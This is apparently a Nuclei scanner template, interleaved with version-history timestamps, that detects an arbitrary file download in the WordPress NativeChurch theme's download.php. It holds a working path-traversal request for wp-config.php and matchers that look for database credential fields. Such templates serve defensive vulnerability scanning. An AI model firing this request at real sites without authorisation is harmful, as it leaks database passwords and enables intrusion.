2021-07-15 09:41:08 +00:00
id : nativechurch-wp-theme-lfd
info :
2022-05-13 20:26:43 +00:00
name : WordPress NativeChurch Theme - Arbitrary File Retrieval
2021-07-15 09:41:08 +00:00
author : 0x_Akoko
severity : high
2022-05-13 20:26:43 +00:00
description : An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system.
2022-04-22 10:38:41 +00:00
reference :
- https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
2021-07-15 09:46:37 +00:00
tags : wordpress,wp-theme,lfi
2021-07-15 09:41:08 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'
matchers-condition : and
matchers :
- type : word
words :
- "DB_NAME"
- "DB_PASSWORD"
2021-07-15 12:13:45 +00:00
- "DB_HOST"
- "The base configurations of the WordPress"
2021-07-15 09:41:08 +00:00
part : body
condition : and